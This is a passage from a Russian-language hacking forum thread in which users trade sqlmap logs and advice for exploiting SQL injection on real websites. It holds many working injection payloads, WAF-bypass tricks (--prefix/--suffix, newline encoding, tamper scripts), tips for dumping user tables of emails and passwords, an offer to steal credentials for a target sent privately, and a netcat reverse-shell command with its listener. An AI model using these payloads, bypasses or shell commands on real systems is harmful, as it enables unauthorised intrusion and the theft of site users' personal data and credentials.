|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program

starting at 02:20:02

[02:20:02] [INFO] resuming back-end DBMS 'mysql'
[02:20:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: subcategory (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: subcategory=8 AND 7118=7118

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: subcategory=8 AND SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: subcategory=8 UNION ALL SELECT CONCAT(0x7162627171,0x7665706c754e46
41694f424f67757945514458435369775648614c62644a5657 4b536753446d634f,0x7178716271)
,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Dnsi
---
[02:20:08] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.3.29
back-end DBMS: MySQL >= 5.0.12
[02:20:08] [INFO] fetched data logged to text files under 'C:\Users\user\.sqlmap\
output\site.ru'

shutting down at 02:20:08

И почему у меня после выполнения команды вылазиет такое сообщение ?


Code:
"parent_ID" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
"sub" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
"open" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.

D:\>

l0mt1k
26.04.2017, 11:28
Code:
"parent_ID" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
"sub" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
"open" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.

D:\>

Это рофл чтоли? Потому что вы пытаетесь выполнить эти параметры, что вы там пишете в командной строке?

Groove
26.04.2017, 11:43
l0mt1k said:
↑ (https://antichat.live/posts/4076866/)

Code:
"parent_ID" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
"sub" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
"open" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.

D:\>

Это рофл чтоли? Потому что вы пытаетесь выполнить эти параметры, что вы там пишете в командной строке?




Code:
--dbs

l0mt1k
26.04.2017, 12:48
Groove said:
↑ (https://antichat.live/posts/4076868/)

Code:
--dbs



Именно sqlmap не может выдавать такие ошибки, это ошибки ос..

Скиньте таргет в лс, мне даже интересно.

Shubka75
26.04.2017, 17:32
Groove said:
↑ (https://antichat.live/posts/4076808/)
И почему у меня после выполнения команды вылазиет такое сообщение ?


в двойные кавычки урл засуньте, и ошибок никаких не будет

Groove
26.04.2017, 18:57
Разобрался , всем спасибо!

spize0r
07.05.2017, 21:22
Что означает эта ошибка при выполнении команды "update" через --sql-shell:

[WARNING] execution of custom SQL queries is only available when stacked queries are supported

? и можно ли найти пути обхода ?

cat1vo
07.05.2017, 22:15
Это говорит о том, что инъекция в SELECT запросе, где не возможно выполнить UPDATE.

Условия при которых возможно использование Stacked Queries

http://securityidiots.com/post_images/stacked_q1.png?1

spize0r
07.05.2017, 22:32
Не понял, cms на php. На одном сайте проходит update, на другом нет. Как я понял завист от настройки на сервере? Но вопрос : может ли чтото измениться, если поиграться с параметрами, или это уже все?

brown
09.05.2017, 11:03
[08:44:51] [INFO] the back-end DBMS is MySQL

web application technology: Apache 2, PHP 5.5.38

back-end DBMS: MySQL >= 5.0

[08:44:51] [INFO] fetching database names

[08:44:51] [DEBUG] resuming configuration option 'code' (200)

[08:44:51] [DEBUG] searching for error chunk length...

[08:44:51] [PAYLOAD] 1 AND (SELECT 2283 FROM(SELECT COUNT(*),CONCAT(0x71786b7071,(SELECT REPEAT(0x34,1024)),0x716b6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

[08:45:22] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)

[08:45:22] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')

[08:45:53] [DEBUG] connection timed out to the target URL or proxy. sqlmap is going to retry the request

[08:46:23] [DEBUG] connection timed out to the target URL or proxy. sqlmap is going to retry the request

[08:46:54] [CRITICAL] connection timed out to the target URL or proxy

shutting down at 08:46:54

Не хочет мне бд показывать )) Уже и с прокси пробывал и тд.Что делать?

brown
10.05.2017, 20:53
spize0r said:
↑ (https://antichat.live/posts/4081451/)
Не понял, cms на php. На одном сайте проходит update, на другом нет. Как я понял завист от настройки на сервере? Но вопрос : может ли чтото измениться, если поиграться с параметрами, или это уже все?


Зависит от привилегий пользователя под которым ты сейчас.На первом сайте ты под админом на втором нет. --is-dba

spize0r
11.05.2017, 15:25
brown said:
↑ (https://antichat.live/posts/4082775/)
Зависит от привилегий пользователя под которым ты сейчас.На первом сайте ты под админом на втором нет. --is-dba


не соглашусь. --is-dba везде False. это влияет только на возможность работы с файловой системой. а вотредактирование записей в бд может быть может нет. возможно я как то не так запускаю тесты. хотлделал и с максимальными параметрами --level и --risk. все однно. одна и таже cms на разных хостингах . на одном редактирование проходят на других нет.

MollizZz
12.05.2017, 13:08
RaWaS said:
↑ (https://antichat.live/posts/4073298/)
Неправильно вставляешь ссылку


Подскажи, как правильно ее вставлять в SQLMAP

Например, выдало вот такое:


Code:
GET /video.php?id=-1'%20OR%203*2*1%3d6%20AND%20000432%3d000432%20--%20 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://site.com/
Cookie: PHPSESSID=4n4rsiu4gpbich32fllrl26gr6
Host: site.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Как правильно вставить ссылку?

t0ma5
12.05.2017, 13:28
MollizZz said:
↑ (https://antichat.live/posts/4083424/)
Подскажи, как правильно ее вставлять в SQLMAP
Например, выдало вот такое:

Code:
GET /video.php?id=-1'%20OR%203*2*1%3d6%20AND%20000432%3d000432%20--%20 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://site.com/
Cookie: PHPSESSID=4n4rsiu4gpbich32fllrl26gr6
Host: site.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Как правильно вставить ссылку?


что то около того

-u 'site.com/video.php?id=-1' --cookie="PHPSESSID=4n4rsiu4gpbich32fllrl26gr6" --random-agent -v 3

если нужен вектор именно boolean то добавь ещё флаг --technique=B

MollizZz
12.05.2017, 13:32
t0ma5 said:
↑ (https://antichat.live/posts/4083426/)
что то около того
-u 'site.com/video.php?id=-1' --cookie="PHPSESSID=4n4rsiu4gpbich32fllrl26gr6" --random-agent -v 3
если нужен вектор именно boolean то добавь ещё флаг --technique=B


Пару часов назад спорил с одним товарищем по поводу техник

Суть спора, что техники надо использовать только EU, так как то же самый --technique=B доступ к БД и колонкам откроет, но сливать колонки будет по 1 символу в 2-3 секунды

Он рекомендует только --technique=EU

Так ли это?

t0ma5
12.05.2017, 13:34
MollizZz said:
↑ (https://antichat.live/posts/4083427/)
Пару часов назад спорил с одним товарищем по поводу техник
Суть спора, что техники надо использовать только EU, так как то же самый --technique=B доступ к БД и колонкам откроет, но сливать колонки будет по 1 символу в 2-3 секунды
Он рекомендует только --technique=EU
Так ли это?


любая техника достаёт информацию из базы, вопрос только во времени

MollizZz
12.05.2017, 13:38
t0ma5 said:
↑ (https://antichat.live/posts/4083428/)
любая техника достаёт информацию из базы, вопрос только во времени


Я лично вчера проводил эксперимент с одним сайтом

Без каких либо техник уязвимость была вскрыта. Доступ к БД был открыт (правда начало сливать 1 символ в несколько секунд)

С --technique=EU - не вскрыл

Сайтец хороший, но те же самые 60к строк нужных колонок будет сливать месяц точно. Забросил в итоге

t0ma5
12.05.2017, 13:49
MollizZz said:
↑ (https://antichat.live/posts/4083429/)
Я лично вчера проводил эксперимент с одним сайтом
Без каких либо техник уязвимость была вскрыта. Доступ к БД был открыт (правда начало сливать 1 символ в несколько секунд)
С --technique=EU - не вскрыл
Сайтец хороший, но те же самые 60к строк нужных колонок будет сливать месяц точно. Забросил в итоге


sqlmap не всегда сам нормально находит реализацию union вектору, лучше ему подсказывать

--union-cols количество колонок

--prefix --suffix начало и конец строки для инъекции

может там waf был, зря забросил, нужно было попробовать раскрутить скуль руками

"но те же самые 60к строк нужных колонок будет сливать месяц точно" стоило попробовать получить полноценный доступ к бд поискав другие лазейки, к тому же какой никакой доступ к базе есть, а там зачастую хранятся логины/пароли

Xsite
12.05.2017, 13:54
t0ma5 said:
↑ (https://antichat.live/posts/4083433/)
sqlmap не всегда сам нормально находит реализацию union вектору, лучше ему подсказывать
--union-cols количество колонок
--prefix --suffix начало и конец строки для инъекции
может там waf был, зря забросил, нужно было попробовать раскрутить скуль руками
"но те же самые 60к строк нужных колонок будет сливать месяц точно" стоило попробовать получить полноценный доступ к бд поискав другие лазейки, к тому же какой никакой доступ к базе есть, а там зачастую хранятся логины/пароли


Кхм , можешь обьяснить на примере самой обычной скули ,как правильно юзать --prefix --suffix

brown
12.05.2017, 14:01
Такой вопрос сижу в бд под обычным юзерем.Есть лог пасс админа.Как подлючится к бд под рутом?

t0ma5
12.05.2017, 14:03
Xsite said:
↑ (https://antichat.live/posts/4083435/)
Кхм , можешь обьяснить на примере самой обычной скули ,как правильно юзать --prefix --suffix


предположим есть скуль вида


Code:
?id=7') union select 1,2,3,4

waf блокирует запрос, но проверка не проверяет что строка многострочная, добавляем перенос строки %0A


Code:
?id=7')%0A union select 1,2,3,4

символы комментариев запрещены, а нам надо как то корректно закрыть запрос(открытую скобку), добавляем


Code:
?id=7')%0A union select 1,2,3,4 and 1=('1

чтобы объяснить это скульмапу используем

--prefix="')%0A" --suffix="and 1=('1"

примерно так, в общем prefix и suffix нужны для кастомизации запроса, prefix - вначале, suffix - в конце

MollizZz
13.05.2017, 13:11
Привет всем. Подскажите. Сегодня столкнулся с этим:

.SpoilerTarget" type="button">Spoiler: Pass???
http://i.imgur.com/f6W19R5.png
Как можно это победить?

brown
14.05.2017, 11:53
MollizZz said:
↑ (https://antichat.live/posts/4083810/)
Привет всем. Подскажите. Сегодня столкнулся с этим:
Spoiler: Pass???
http://i.imgur.com/f6W19R5.png
Как можно это победить?


charset

brown
14.05.2017, 11:55
[09:52:37] [INFO] testing connection to the target URL

[09:52:37] [DEBUG] declared web page charset 'utf-8'

[09:52:37] [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401)

[09:52:37] [WARNING] HTTP error codes detected during run:

401 (Unauthorized) - 1 times

Такая трабла,нашел скулю бурпом [ JSON parameter] причем бурп не видит никакой аундефикации и тд.пробую крутануть мапом вот такая ошибка.Кто сталкивался?Что делать?

MollizZz
16.05.2017, 21:13
Суть проблемы. Лью хороший сайт. Льется медленно, но уверенно

Периодически останавливаю и проверяю. Прошло уже процентов 20

Но нет данных с колонки "mail"

http://i.imgur.com/1NlzXfh.png

Собственно вопрос. Бывает так, что сначала сливает пассы, а потом мыла?

p.s. Пишет так же такое: [WARNING] reflective value(s) found and filtering out и стоит на месте


Code:
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: search=if(now()=sysdate(),sleep(0),0)/'||(SELECT 'YgBm' FROM DUAL WHERE 2861=2861 AND (SELECT 1089 FROM(SELECT COUNT(*),CONCAT(0x7170627671,(SELECT (ELT(1089=1089
,1))),0x71716b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||''XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/
---
[12:21:59] [INFO] testing MySQL
[12:21:59] [INFO] confirming MySQL
[12:21:59] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45
back-end DBMS: MySQL >= 5.0.0
[12:21:59] [INFO] fetching entries of column(s) 'email' for table 'user' in database 'SITE.COM'
[12:21:59] [INFO] the SQL query used returns 182215 entries
due to huge table size do you want to remove ORDER BY clause gaining speed over consistency? [y/N] N
[12:21:59] [INFO] starting 10 threads
[12:22:00] [INFO] heuristics detected web page charset 'windows-1252'
[12:22:00] [WARNING] reflective value(s) found and filtering out

brown
17.05.2017, 13:46
MollizZz said:
↑ (https://antichat.live/posts/4085254/)
Суть проблемы. Лью хороший сайт. Льется медленно, но уверенно
Периодически останавливаю и проверяю. Прошло уже процентов 20
Но нет данных с колонки "mail"
http://i.imgur.com/1NlzXfh.png
Собственно вопрос. Бывает так, что сначала сливает пассы, а потом мыла?
p.s. Пишет так же такое: [WARNING] reflective value(s) found and filtering out и стоит на месте

Code:
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: search=if(now()=sysdate(),sleep(0),0)/'||(SELECT 'YgBm' FROM DUAL WHERE 2861=2861 AND (SELECT 1089 FROM(SELECT COUNT(*),CONCAT(0x7170627671,(SELECT (ELT(1089=1089
,1))),0x71716b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||''XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/
---
[12:21:59] [INFO] testing MySQL
[12:21:59] [INFO] confirming MySQL
[12:21:59] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45
back-end DBMS: MySQL >= 5.0.0
[12:21:59] [INFO] fetching entries of column(s) 'email' for table 'user' in database 'SITE.COM'
[12:21:59] [INFO] the SQL query used returns 182215 entries
due to huge table size do you want to remove ORDER BY clause gaining speed over consistency? [y/N] N
[12:21:59] [INFO] starting 10 threads
[12:22:00] [INFO] heuristics detected web page charset 'windows-1252'
[12:22:00] [WARNING] reflective value(s) found and filtering out




Нет.Занчит в бд нет Емайлов

brown
17.05.2017, 13:46
'%2b(select convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCH AR(77)%2bCHAR(72)%2bCHAR(107)%2bCHAR(116)%2bCHAR(1 12)%2bCHAR(80)%2bCHAR(80)%2bCHAR(116)) FROM syscolumns)%2b'

В чем может быть проблема?

Обычный еррорбасед

MollizZz
17.05.2017, 13:48
brown said:
↑ (https://antichat.live/posts/4085574/)
Нет.Занчит в бд нет Емайлов


Нет. В БД есть мыла. Ковырял в командах и в какой то момент начало их лить и сразу будто что то остановило дальнейший слив. Они как то защищены. И регистрация на этом сайте не возможна без почты

RWD
17.05.2017, 14:01
MollizZz said:
↑ (https://antichat.live/posts/4085576/)
Нет. В БД есть мыла. Ковырял в командах и в какой то момент начало их лить и сразу будто что то остановило дальнейший слив. Они как то защищены. И регистрация на этом сайте не возможна без почты


типичный лимит запросов в минуту.

MollizZz
17.05.2017, 14:02
RWD said:
↑ (https://antichat.live/posts/4085585/)
типичный лимит запросов в минуту.


Подскажи выход?

brown
17.05.2017, 14:04
MollizZz said:
↑ (https://antichat.live/posts/4085587/)
Подскажи выход?


--delay --time-sec

spize0r
18.05.2017, 14:42
Подскажите по такому вопросу. Нужно раскрыть названия директорий в списке, в частности найти админку.

Все способы перпробовал, вроде все закрыто. Но. При использовании SQLMAP можно получить путь к базе.


Code:
[13:12:11] [INFO] retrieving MySQL plugin directory absolute path
[13:12:11] [INFO] resumed: /us\x81/lib64/mysql/plugin

Сама уязвимость.


Code:
Parameter: id (GET)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (comment)
Payload: id=103;SELECT SLEEP(5)#&id=103

Если отрывается путь к базе, значит можно и просканировать все папки подумал я.

Начал использовать --os-shell.

UDF вроде как создается


Code:
creating UDF 'sys_eval'
creating UDF 'sys_exec'

И, также при завершении os-shell, программа спрашивает:


Code:
[13:40:08] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n]

НО команды в строке ничего не выводят, как только не делал


Code:
os-shell> namehost
do you want to retrieve the command standard output? [Y/n/a] y
[13:26:35] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
No output

Сообственно вопрос: если нашло путь к базе, хоть и долго мучало сервер, но нашло. Значит можно получить любые директории? Есть ли какие то мысли на этот счет?

BabaDook
18.05.2017, 14:52
spize0r said:
↑ (https://antichat.live/posts/4086130/)
Подскажите по такому вопросу. Нужно раскрыть названия директорий в списке, в частности найти админку.
Все способы перпробовал, вроде все закрыто. Но. При использовании SQLMAP можно получить путь к базе.

Code:
[13:12:11] [INFO] retrieving MySQL plugin directory absolute path
[13:12:11] [INFO] resumed: /us\x81/lib64/mysql/plugin

Сама уязвимость.

Code:
Parameter: id (GET)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (comment)
Payload: id=103;SELECT SLEEP(5)#&id=103

Если отрывается путь к базе, значит можно и просканировать все папки подумал я.
Начал использовать --os-shell.
UDF вроде как создается

Code:
creating UDF 'sys_eval'
creating UDF 'sys_exec'

И, также при завершении os-shell, программа спрашивает:

Code:
[13:40:08] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n]

НО
команды в строке ничего не выводят, как только не делал

Code:
os-shell> namehost
do you want to retrieve the command standard output? [Y/n/a] y
[13:26:35] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
No output

Сообственно вопрос: если нашло путь к базе, хоть и долго мучало сервер, но нашло. Значит можно получить любые директории? Есть ли какие то мысли на этот счет?


Это пути директории где по умолчанию находятся плагины. В ТОМ числе плагин, или как она ещё верно называется библиотека для мускул сервера что бы выполнить UDF. А значит , я смею предположить что ничего вы не нашли. Ну предположим, у вас слепое

выполнение команд. На целевом сервере делаем запрос nc ((195,1,1,1)ip вашего сервера) 4444 -e /bin/sh . У себя на выделенным сервере nc -lvp 4444. В случаи успеха будет шелл. Но, я очень сомневаюсь что у вас что-то получиться. Удачи.

spize0r
18.05.2017, 15:04
BabaDook said:
↑ (https://antichat.live/posts/4086134/)
Это пути директории где по умолчанию находятся плагины. В ТОМ числе плагин, или как она ещё верно называется библиотека для мускул сервера что бы выполнить UDF. А значит , я смею предположить что ничего вы не нашли. Ну предположим, у вас слепое
выполнение команд. На целевом сервере делаем запрос nc ((195,1,1,1)ip вашего сервера) 4444 -e /bin/sh . У себя на выделенным сервере nc -lvp 4444. В случаи успеха будет шелл. Но, я очень сомневаюсь что у вас что-то получиться. Удачи.


Вопрос: почему нельзя искать любые директории если находит дир. библиотек, и почему нельзя записать шел на сервер, если пишет UDF ?

spize0r
18.05.2017, 15:16
BabaDook said:
↑ (https://antichat.live/posts/4086146/)
Я чё та туплю. А что за команду вы пытайтесь выполнить 'namehost' - это вы откуда взяли ?. Если команды выполняются, то можно искать диры, файлы, итд


А какие команды можно выполнять в строке os-shell> ?

чтобы не получать:

No output

spize0r
18.05.2017, 15:44
Блин ступлил, hostname и выполнял . Опечатался.

Ничего не выводит. И все же непонятен вопрос почему он может сканировать путь к плагинам, а к другим файлам нет.

Ведь если SQLMAP может найти этот путь, то и вывести список файлов по заданному пути в директории тоже есть вариант. Или нет?

Xsite
18.05.2017, 15:59
Ребят подскажите

Есть обычный ерор

Type: error-based

Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)

Колонки с малым кол-во записей дампятся и тд и тп

но в основной таблице с юзерами ,начинаю дамп , он пробует определить кол-во записей emai,password,salt и через секунд 10 идет редирект

[14:56:50] [INFO] testing MySQL

[14:56:50] [PAYLOAD] -2390

[14:56:50] [WARNING] reflective value(s) found and filtering out

[14:56:50] [DEBUG] resuming configuration option 'optimize' (True)

[14:56:50] [DEBUG] performed 0 queries in 0.00 seconds

[14:56:50] [INFO] confirming MySQL

[14:56:50] [DEBUG] performed 0 queries in 0.00 seconds

[14:56:50] [DEBUG] performed 0 queries in 0.00 seconds

[14:56:50] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.0

[14:56:50] [PAYLOAD] -5914' OR 1 GROUP BY CONCAT(0x7178767a71,(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM vbforums.vb3_user),0x71786b7a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#

sqlmap got a 302 redirect to 'https://www.site.com:443/'. Do you want to follow? [Y/n] n

[14:57:04] [DEBUG] performed 1 queries in 13.98 seconds

[14:57:04] [ERROR] unable to retrieve the number of entries for any table

t0ma5
18.05.2017, 16:27
Xsite said:
↑ (https://antichat.live/posts/4086184/)
что можно придумать ?


оу, как лестно

попробуй крутить сразу по https и c www

попробуй дампить не все сразу, а частями, заюзав --where="id

Xsite
18.05.2017, 16:33
[QUOTE="t0ma5"]
t0ma5 said:
↑ (https://antichat.live/posts/4086200/)
оу, как лестно
попробуй крутить сразу по https и c www
попробуй дампить не все сразу, а частями, заюзав --where="id

t0ma5
18.05.2017, 16:49
Xsite said:
↑ (https://antichat.live/posts/4086205/)
Все перепробовал ,не получается .
Все как и было
sqlmap got a 302 redirect to '
http://www.site:80/
'. Do you want to follow? [Y/n] n
[15:32:10] [ERROR] unable to retrieve the number of entries for any table


может дампнуть через --where только одну учетку, у которой привилегий больше чем у остальных)? в конце концов это можно и без скульмапа сделать

просто из за чего редирект происходит я хз, конкретно такого случая у меня не было

SooLFaa
18.05.2017, 18:37
Xsite said:
↑ (https://antichat.live/posts/4086205/)
Все перепробовал ,не получается .
Все как и было
sqlmap got a 302 redirect to '
http://www.site:80/
'. Do you want to follow? [Y/n] n
[15:32:10] [ERROR] unable to retrieve the number of entries for any table


Таргет в лс кинь и достану тебе учетки.

RWD
18.05.2017, 19:38
реально ли раскрутить? http://www.searchquotes.com/quotes/about/'/ (http://www.searchquotes.com/quotes/about/%27/)

похоже на WAF

еще бы cloudflare

Protocoler
20.05.2017, 17:08
Подскажите, сайтец выдает SQL syntax :


Code:
http://sitew.com/?cat=(select%20convert(int%2cCHAR(65)))

Выдает ошибочку :


Code:
Wordpress database error
Select * FROM wp_post_sorting WHERE category = 0,65

Но дальше никак не раскрутить, бьет 400 ошибку.. Подскажите как сделать ?

Xsite
24.05.2017, 12:59
Ребята ай нид хелп

Type: error-based

Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

При поиске колонок ,через --search -C , находит базы и колонки где инфа , в виде #__users , то есть ,при поиске ,он говорит что в в таблице #__users ,есть колонка email ,но говорит она пустая [WARNING] unable to retrieve column names for table

При обращении -D baza -T #__users --columns , говорит там вообще ничего нету , иди от суда ,мы тебя не звали ,то бишь не выводит даже название колонок

Практически все таблицы в базе вид #__ , но есть привычнообычные ,аля -T info --columns и все прекрасно выводит

В чем проблема ?

t0ma5 (https://antichat.live/members/189242/)

SooLFaa (https://antichat.live/members/261906/)

Взываю к Вам парни

MrBa
24.05.2017, 13:32
Подскажите плиз. Есть уязвимость в виде - http://www.=======.com/index.php?re...ma./**/tAbLeS+/**/gRoUp/**/bY+x)a)+and+'1'='1 (http://www.=======.com/index.php?ref=shavez'+and(%2f**%2fsElEcT+1+%2f**%2 ffRoM(%2f**%2fsElEcT+count(*),%2f**%2fcOnCaT((%2f* *%2fsElEcT(%2f**%2fsElEcT(%2f**%2fsElEcT+%2f**%2fc OnCaT(0x217e21,ifnull(bonusclaims,char(32)),0x217e 21)+%2f**%2ffRoM+twodolla_two.user+%2f**%2flImIt+6 78,1))+%2f**%2ffRoM+information_schema.%2f**%2ftAb LeS+%2f**%2flImIt+0,1),floor(rand(0)*2))x+%2f**%2f fRoM+information_schema.%2f**%2ftAbLeS+%2f**%2fgRo Up%2f**%2fbY+x)a)+and+'1'='1)

как это можно вставить в sqlmap?

RWD
24.05.2017, 14:37
MrBa said:
↑ (https://antichat.live/posts/4088613/)
Подскажите плиз. Есть уязвимость в виде -
http://www.=======.com/index.php?ref=shavez'+and(/**/sElEcT+1+/**/fRoM(/**/sElEcT+count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT+/**/cOnCaT(0x217e21,ifnull(bonusclaims,char(32)),0x217 e21)+/**/fRoM+twodolla_two.user+/**/lImIt+678,1))+/**/fRoM+information_schema./**/tAbLeS+/**/lImIt+0,1),floor(rand(0)*2))x+/**/fRoM+information_schema./**/tAbLeS+/**/gRoUp/**/bY+x)a)+and+'1'='1 (http://www.=======.com/index.php?ref=shavez'+and(%2f**%2fsElEcT+1+%2f**%2 ffRoM(%2f**%2fsElEcT+count(*),%2f**%2fcOnCaT((%2f* *%2fsElEcT(%2f**%2fsElEcT(%2f**%2fsElEcT+%2f**%2fc OnCaT(0x217e21,ifnull(bonusclaims,char(32)),0x217e 21)+%2f**%2ffRoM+twodolla_two.user+%2f**%2flImIt+6 78,1))+%2f**%2ffRoM+information_schema.%2f**%2ftAb LeS+%2f**%2flImIt+0,1),floor(rand(0)*2))x+%2f**%2f fRoM+information_schema.%2f**%2ftAbLeS+%2f**%2fgRo Up%2f**%2fbY+x)a)+and+'1'='1)
как это можно вставить в sqlmap?


укажи на уязвимый параметр, с скульмапе это символ *

к примеру

id=12312*

page/2*

то что ты скинул, это тупо вывод пентеста сканера.

- http://www.=======.com/index.php?ref=shavez* (http://www.%3D%3D%3D%3D%3D%3D%3D.com/index.php?ref=shavez%27+and(%2f**%2fsElEcT+1+%2f** %2ffRoM(%2f**%2fsElEcT+count(*),%2f**%2fcOnCaT((%2 f**%2fsElEcT(%2f**%2fsElEcT(%2f**%2fsElEcT+%2f**%2 fcOnCaT(0x217e21,ifnull(bonusclaims,char(32)),0x21 7e21)+%2f**%2ffRoM+twodolla_two.user+%2f**%2flImIt +678,1))+%2f**%2ffRoM+information_schema.%2f**%2ft AbLeS+%2f**%2flImIt+0,1),floor(rand(0)*2))x+%2f**% 2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2fg RoUp%2f**%2fbY+x)a)+and+%271%27=%271)

или - http://www.=======.com/index.php?ref=shavez (http://www.%3D%3D%3D%3D%3D%3D%3D.com/index.php?ref=shavez%27+and(%2f**%2fsElEcT+1+%2f** %2ffRoM(%2f**%2fsElEcT+count(*),%2f**%2fcOnCaT((%2 f**%2fsElEcT(%2f**%2fsElEcT(%2f**%2fsElEcT+%2f**%2 fcOnCaT(0x217e21,ifnull(bonusclaims,char(32)),0x21 7e21)+%2f**%2ffRoM+twodolla_two.user+%2f**%2flImIt +678,1))+%2f**%2ffRoM+information_schema.%2f**%2ft AbLeS+%2f**%2flImIt+0,1),floor(rand(0)*2))x+%2f**% 2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2fg RoUp%2f**%2fbY+x)a)+and+%271%27=%271) -p ref

panic.ker
24.05.2017, 15:51
RWD said:
↑ (https://antichat.live/posts/4088640/)
укажи на уязвимый параметр, с скульмапе это символ *
к примеру
id=12312*
page/2*
то что ты скинул, это тупо вывод пентеста сканера.
-
http://www.=======.com/index.php?ref=shavez* (http://www.%3D%3D%3D%3D%3D%3D%3D.com/index.php?ref=shavez%27+and(%2f**%2fsElEcT+1+%2f** %2ffRoM(%2f**%2fsElEcT+count(*),%2f**%2fcOnCaT((%2 f**%2fsElEcT(%2f**%2fsElEcT(%2f**%2fsElEcT+%2f**%2 fcOnCaT(0x217e21,ifnull(bonusclaims,char(32)),0x21 7e21)+%2f**%2ffRoM+twodolla_two.user+%2f**%2flImIt +678,1))+%2f**%2ffRoM+information_schema.%2f**%2ft AbLeS+%2f**%2flImIt+0,1),floor(rand(0)*2))x+%2f**% 2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2fg RoUp%2f**%2fbY+x)a)+and+%271%27=%271)
или -
http://www.=======.com/index.php?ref=shavez (http://www.%3D%3D%3D%3D%3D%3D%3D.com/index.php?ref=shavez%27+and(%2f**%2fsElEcT+1+%2f** %2ffRoM(%2f**%2fsElEcT+count(*),%2f**%2fcOnCaT((%2 f**%2fsElEcT(%2f**%2fsElEcT(%2f**%2fsElEcT+%2f**%2 fcOnCaT(0x217e21,ifnull(bonusclaims,char(32)),0x21 7e21)+%2f**%2ffRoM+twodolla_two.user+%2f**%2flImIt +678,1))+%2f**%2ffRoM+information_schema.%2f**%2ft AbLeS+%2f**%2flImIt+0,1),floor(rand(0)*2))x+%2f**% 2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2fg RoUp%2f**%2fbY+x)a)+and+%271%27=%271)
-p ref


+

--tamper="space2comment,randomcase"

MrScrudg
24.05.2017, 16:00
Приветствую, прошу помочь разобраться с ошибкой (https://image.prntscr.com/image/44eac371e03a4d1e86e5fba452a5b3a0.png): https://image.prntscr.com/image/44eac371e03a4d1e86e5fba452a5b3a0.png После ошибки выводит только , если перезапустить с этого же места - все ок, но только до возникновение этой ошибки опять. Надеюсь на помощь

RWD
24.05.2017, 21:56
MrScrudg said:
↑ (https://antichat.live/posts/4088675/)
Приветствую, прошу помочь разобраться с ошибкой (
https://image.prntscr.com/image/44eac371e03a4d1e86e5fba452a5b3a0.png
):
https://image.prntscr.com/image/44eac371e03a4d1e86e5fba452a5b3a0.png
После ошибки выводит только , если перезапустить с этого же места - все ок, но только до возникновение этой ошибки опять. Надеюсь на помощь


попробуй --no-cast и количество потоков по меньше если стоит --threads 10

MollizZz
24.05.2017, 22:29
RWD said:
↑ (https://antichat.live/posts/4088851/)
попробуй --no-cast и количество потоков по меньше если стоит --threads 10


А как победить это:

.SpoilerTarget" type="button">Spoiler: Хрень какая то
http://i.imgur.com/DQiTM7r.png

MrBa
25.05.2017, 05:55
RWD said:
